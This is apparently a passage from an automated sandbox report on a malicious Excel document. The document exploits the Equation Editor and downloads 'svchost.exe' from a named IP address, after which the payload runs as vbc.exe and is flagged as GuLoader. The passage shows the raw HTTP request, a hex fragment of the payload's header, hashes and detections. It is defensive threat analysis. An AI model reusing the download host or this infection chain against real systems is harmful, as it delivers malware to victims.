                Jun 14, 2021 08:54:15.654759884 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654767036 CEST4916780192.168.2.22103.155.82.236
                Jun 14, 2021 08:54:15.654772997 CEST8049167103.155.82.236192.168.2.22
                Jun 14, 2021 08:54:15.654789925 CEST8049167103.155.82.236192.168.2.22

                HTTP Request Dependency Graph

                • 103.155.82.236

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249167103.155.82.23680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                TimestampkBytes transferredDirectionData
                Jun 14, 2021 08:54:14.406260014 CEST0OUTGET /nrsdoc/svchost.exe HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 103.155.82.236
                Connection: Keep-Alive
                Jun 14, 2021 08:54:14.656141043 CEST2INHTTP/1.1 200 OK
                Date: Mon, 14 Jun 2021 06:54:23 GMT
                Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                Last-Modified: Sun, 13 Jun 2021 20:01:48 GMT
                ETag: "24000-5c4ab36086dc4"
                Accept-Ranges: bytes
                Content-Length: 147456
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/x-msdownload
                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 40 bb 60 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 10 02 00 00 30 00 00 00 00 00 00 a4 18 00 00 00 10 00 00 00 20 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 05 58 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 17 02 00 28 00 00 00 00 40 02 00 30 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 0e 02 00 00 10 00 00 00 10 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 20 02 00 00 10 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 09 00 00 00 40 02 00 00 10 00 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#BBBL^B`BdBRichBPEL@`R0 @PX(@0( .text `.datax @.rsrc0@0@@IMSVBVM60.DLL


                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:08:53:46
                Start date:14/06/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13f2c0000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:08:54:08
                Start date:14/06/2021
                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Wow64 process (32bit):true
                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Imagebase:0x400000
                File size:543304 bytes
                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:08:54:11
                Start date:14/06/2021
                Path:C:\Users\Public\vbc.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\Public\vbc.exe'
                Imagebase:0x400000
                File size:147456 bytes
                MD5 hash:EE83942376EA5717149517FCC832AB9F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Visual Basic
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 29%, Virustotal, Browse
                • Detection: 9%, ReversingLabs
                Reputation:low

                Disassembly

                Code Analysis

                Reset < >